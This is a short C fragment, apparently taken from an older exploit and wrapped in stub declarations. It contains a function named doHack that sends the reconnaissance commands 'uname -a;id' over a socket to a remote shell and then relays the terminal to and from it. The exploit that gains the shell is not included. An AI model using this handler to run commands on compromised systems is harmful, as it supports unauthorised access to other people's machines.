
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






typedef int fd_set ;


 scalar_t__ EAGAIN ;
 scalar_t__ EWOULDBLOCK ;
 scalar_t__ FD_ISSET (int,int *) ;
 int FD_SET (int,int *) ;
 int FD_ZERO (int *) ;
 int STDIN ;
 int STDOUT ;
 int close (int) ;
 scalar_t__ errno ;
 int exit (int) ;
 int read (int,char*,int) ;
 scalar_t__ select (int,int *,int *,int *,int *) ;
 int write (int,char*,int) ;

void doHack(int Sock)
{
 char buffer[1024 * 10];
 int count;
 fd_set readfs;

 write(Sock,"uname -a;id\n",12);
 while(1)
 {
  FD_ZERO(&readfs);
  FD_SET(STDIN, &readfs);
  FD_SET(Sock, &readfs);
  if(select(Sock + 1, &readfs, ((void*)0), ((void*)0), ((void*)0)) > 0)
  {
   if(FD_ISSET(STDIN, &readfs))
   {
    if((count = read(STDIN, buffer, 1024)) <= 0)
    {
     if(errno == EWOULDBLOCK || errno == EAGAIN)
      continue;
     else
     {
      close(Sock);
      exit(-1);
     }
    }
    write(Sock, buffer, count);
   }
   if(FD_ISSET(Sock, &readfs))
   {
    if((count = read(Sock, buffer, 1024)) <= 0)
    {
     if(errno == EWOULDBLOCK || errno == EAGAIN)
      continue;
     else
     {
      close(Sock);
      exit(-1);
     }
    }
    write(STDOUT, buffer, count);
   }
  }
 }
}
